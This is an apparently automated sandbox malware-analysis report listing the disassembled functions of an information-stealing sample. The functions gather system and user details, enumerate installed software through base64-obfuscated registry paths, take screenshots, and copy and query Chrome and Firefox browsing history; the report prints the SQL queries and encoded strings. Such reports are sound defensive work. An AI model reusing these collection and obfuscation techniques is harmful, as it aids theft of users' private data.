Computer(Username) : , xrefs: 00417364
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19

Function 0041727C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Layouts: , xrefs: 0041741C
EXE_PATH : , xrefs: 004172D3
[Soft], xrefs: 004174D4
LocalTime: , xrefs: 0041743F
, xrefs: 004172E5, 00417472, 00417490
Windows : , xrefs: 004172F8
Screen: , xrefs: 004173BD
Zone: , xrefs: 00417462
Computer(Username) : , xrefs: 00417364
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19

Function 00417290 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Layouts: , xrefs: 0041741C
EXE_PATH : , xrefs: 004172D3
[Soft], xrefs: 004174D4
LocalTime: , xrefs: 0041743F
, xrefs: 004172E5, 00417472, 00417490
Windows : , xrefs: 004172F8
Screen: , xrefs: 004173BD
Zone: , xrefs: 00417462
Computer(Username) : , xrefs: 00417364
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19

Function 00407DD0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

CreateEnvironmentBlock, xrefs: 00407E24
kernel32.dll, xrefs: 00407DFB
D, xrefs: 00407E5D
wtsapi32.dll, xrefs: 00407E12
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
WTSQueryUserToken, xrefs: 00407E0D
userenv.dll, xrefs: 00407E29

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68

Function 00407DD4 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

CreateEnvironmentBlock, xrefs: 00407E24
kernel32.dll, xrefs: 00407DFB
D, xrefs: 00407E5D
wtsapi32.dll, xrefs: 00407E12
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
WTSQueryUserToken, xrefs: 00407E0D
userenv.dll, xrefs: 00407E29

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58

Function 00416B94 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
a2VybmVsMzIuZGxs, xrefs: 00416C61
kernel32.dll, xrefs: 00416BFF, 00416C2D
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B8C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
a2VybmVsMzIuZGxs, xrefs: 00416C61
kernel32.dll, xrefs: 00416BFF, 00416C2D
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B90 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
a2VybmVsMzIuZGxs, xrefs: 00416C61
kernel32.dll, xrefs: 00416BFF, 00416C2D
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00415F30 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

), xrefs: 004160E7, 004162AA
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs, xrefs: 00415F72, 00416135
(), xrefs: 00416304
, xrefs: 0041633A
RGlzcGxheU5hbWU=, xrefs: 00415FB9, 0041617C
RGlzcGxheVZlcnNpb24=, xrefs: 0041605A, 0041621D
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==, xrefs: 00415FE8, 00416089, 004161AB, 0041624C

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: Open$EnumFreeString$QueryValue
String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
API String ID: 811798878-3013244427
Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D

Function 004178B4 Relevance: 18.2, APIs: 12, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00417994
CreateCompatibleDC.GDI32(00000000), ref: 0041799D
CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
SelectObject.GDI32(00000000,00000000), ref: 004179B6
BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 004179E8
GetHGlobalFromStream.COMBASE(?,?), ref: 00417A76
GlobalLock.KERNEL32(?), ref: 00417A80
GlobalUnlock.KERNEL32(?), ref: 00417AA2
DeleteObject.GDI32(00000000), ref: 00417AA8
DeleteDC.GDI32(00000000), ref: 00417AAE
ReleaseDC.USER32(00000000,00000000), ref: 00417AB6

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
String ID:
API String ID: 734935659-0
Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58

Function 004129A4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004129E8
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
DeleteFileW.KERNEL32(00000000), ref: 00412C05

Strings

, xrefs: 00412B98
SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
.tmp, xrefs: 00412A03
%TEMP%, xrefs: 00412A23

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
API String ID: 2381671008-351388873
Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58

Function 0041256C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004125B0
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
DeleteFileW.KERNEL32(00000000), ref: 004127CD

Strings

%TEMP%, xrefs: 004125EB
.tmp, xrefs: 004125CB
, xrefs: 00412760
SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
API String ID: 2381671008-462058183
Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58

Function 00416744 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Video Info, xrefs: 00416856
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
GetRAM: , xrefs: 00416833
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Model: , xrefs: 0041677E
CPU Count: , xrefs: 004167EF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
